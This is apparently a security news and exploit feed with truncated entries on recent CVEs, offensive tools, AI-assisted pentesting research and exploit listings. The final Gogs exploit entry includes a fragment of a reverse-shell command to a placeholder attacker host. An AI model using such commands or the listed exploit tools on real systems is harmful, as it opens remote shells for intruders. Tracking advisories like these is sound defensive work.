@semic/testing (=2.2.11), @vendure/dashboard (>=3.2.2 <=3.4.4) potentially affected by CVE-2026-40887 via @vendure/core (>=3.0.0 <=3.4.4)

@vendure/core NPM version =3.0.0, =3.2.2, =3.4.4 Source cves: CVE-2026-40887 Source advisory: OSV:GHSA-9PP3-53P2-WW9V...

CloudStorageHunter-Pro

🔥 CloudStorageHunter-Pro 🚀 Ultimate Cloud Storage Security...

CVE-2026-5756

Unauthenticated Configuration File Modification Vulnerability in DRC Central Office Services COS allows an attacker to modify the server's configuration file, potentially leading to mass data exfiltration, malicious traffic interception, or disruption of testing services...

CVE-2026-5756

Unauthenticated Configuration File Modification Vulnerability in DRC Central Office Services COS allows an attacker to modify the server's configuration file, potentially leading to mass data exfiltration, malicious traffic interception, or disruption of testing services...

CVE-2026-5756

DRC COS (Central Office Services) is affected by an unauthenticated configuration file modification vulnerability via the /v0/configuration endpoint. The issue allows a network-adjacent attacker to submit JSON payloads that persistently modify the server’s configuration, potentially enabling data...

ai-pentest-agent

🔐 AI Pentest Agent v4 Automated web application penetration...

PT-2026-32983

Name of the Vulnerable Software and Affected Versions Giskard versions prior to 1.0.2b1 Description The RegexMatching check in the giskard-checks package passes a user-supplied regular expression pattern directly to the Python re.search function without a timeout, complexity guard, or pattern...

LLM-Guided Prompt Evolution for Password Guessing

Passwords still remain a dominant authentication method, yet their security is routinely subverted by predictable user choices and large-scale credential leaks. Automated password guessing is a key tool for stress-testing password policies and modeling attacker behavior. This paper applies...

PT-2026-32896

Name of the Vulnerable Software and Affected Versions DRC Central Office Services COS affected versions not specified Description An unauthenticated configuration file modification issue allows an attacker to modify the server configuration file. This could lead to mass data exfiltration, malicio...

Bluetooth-app

Bluetooth Security Testing App A Kivy-based Android applicati...

Vulnerability Assessment vs Penetration Testing: What Security Leaders Need to Know

Your organization runs quarterly vulnerability scans. You get a report with hundreds, sometimes thousands, of findings. Your team patches what they can and moves on. Six months later, you bring in a penetration testing firm, and they walk right through your defenses using a chain of...

xss_hunter.py

EnterXSS Fuzzer – Automated Cross-Site Scripting Detection...

CVE-2026-6179

CVE-2026-6179 concerns a stored cross-site scripting (XSS) vulnerability in NightWolf Penetration Testing Platform. The affected entry states that an attacker can trigger and run malicious script in a user’s browser due to a stored XSS flaw, enabling impact on user-side confidentiality and integr...

Towards Automated Pentesting with Large Language Models

Large Language Models LLMs are redefining offensive cybersecurity by allowing the generation of harmful machine code with minimal human intervention. While attackers take advantage of dark LLMs such as XXXGPT and WolfGPT to produce malicious code, ethical hackers can follow similar approaches to...

NightWolf Penetration Testing Platform 安全漏洞

NightWolf Penetration Testing Platform is an open-source cybersecurity testing tool developed by NightWolf. It is designed specifically for red teams and penetration testers, used for vulnerability exploitation, privilege escalation, and lateral movement testing. The NightWolf Penetration Testing...

Exploit for CVE-2020-24586

Fracture FragAttacks WiFi Penetration Framework CVE-202...

patchbot

patchbot patchbot is an AI-assisted security reviewer for p...

Exploit for Deserialization of Untrusted Data in Facebook React

R2SAE - React2Shell Auto-Exploit A Firefox extension...

pentest-autopilot-mcps

Pentest Autopilot MCP Servers Professional-grade Model Contex...

Exploit for Path Traversal in Gogs

CVE-2025-8110 — Gogs & /dev/tcp/ATTACKER/4444 0&1"' Cleanu...